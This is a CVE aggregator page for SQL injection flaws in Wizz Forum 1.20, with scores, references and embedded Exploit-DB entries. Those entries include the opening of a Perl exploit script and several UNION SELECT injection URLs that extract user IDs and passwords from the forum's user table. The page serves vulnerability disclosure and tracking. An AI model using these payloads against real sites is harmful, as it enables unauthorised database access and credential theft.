CVE-2005-3682
published 2005-11-18CVE-2005-3682: Multiple SQL injection vulnerabilities in Wizz Forum 1.20 allow remote attackers to execute arbitrary SQL commands via (1) the AuthID parameter in…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.03%
89.3th percentile
Multiple SQL injection vulnerabilities in Wizz Forum 1.20 allow remote attackers to execute arbitrary SQL commands via (1) the AuthID parameter in ForumAuthDetails.php, and the TopicID parameter in (2) ForumTopicDetails.php and (3) ForumReply.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wizz_forum | wizz_forum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Wizz Forum 1.20 - 'TopicID' SQL Injection
exploitdb·2005-11-14
CVE-2005-3682 Wizz Forum 1.20 - 'TopicID' SQL Injection
Wizz Forum 1.20 - 'TopicID' SQL Injection
---
#!/bin/env perl
#//-----------------------------------------------------------#
#// Wizz Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#// http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#
use LWP::Simple;
print "\n#####################################################";
print "\n# Wizz Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://vubb.com/forum/1 #";
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "\n#####################################################";
exit(0);
}
Exploit-DB
Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL Injection
exploitdb·2005-11-14
CVE-2005-3682 Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL Injection
Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL Injection
---
source: https://www.securityfocus.com/bid/15410/info
Wizz Forum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/ForumAuthDetails.php?AuthID=-4654'%20union%20select%20password,userid,password,userid,5,6,7,"http://www.example.com",lastlogin,lastlogin,lastlogin,5465465464,8$
Exploit-DB
Wizz Forum - 'forumreply.php?TopicID' SQL Injection
exploitdb·2005-11-14
CVE-2005-3682 Wizz Forum - 'forumreply.php?TopicID' SQL Injection
Wizz Forum - 'forumreply.php?TopicID' SQL Injection
---
source: https://www.securityfocus.com/bid/15410/info
Wizz Forum is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,userid,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1
http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=113201564319843&w=2http://secunia.com/advisories/17548/http://securityreason.com/securityalert/181http://www.osvdb.org/20845http://www.osvdb.org/20846http://www.osvdb.org/20847http://www.securityfocus.com/bid/15410/referenceshttp://www.vupen.com/english/advisories/2005/2421https://exchange.xforce.ibmcloud.com/vulnerabilities/23170https://exchange.xforce.ibmcloud.com/vulnerabilities/23171http://marc.info/?l=bugtraq&m=113201564319843&w=2http://secunia.com/advisories/17548/http://securityreason.com/securityalert/181http://www.osvdb.org/20845http://www.osvdb.org/20846http://www.osvdb.org/20847http://www.securityfocus.com/bid/15410/referenceshttp://www.vupen.com/english/advisories/2005/2421https://exchange.xforce.ibmcloud.com/vulnerabilities/23170https://exchange.xforce.ibmcloud.com/vulnerabilities/23171
2005-11-18
Published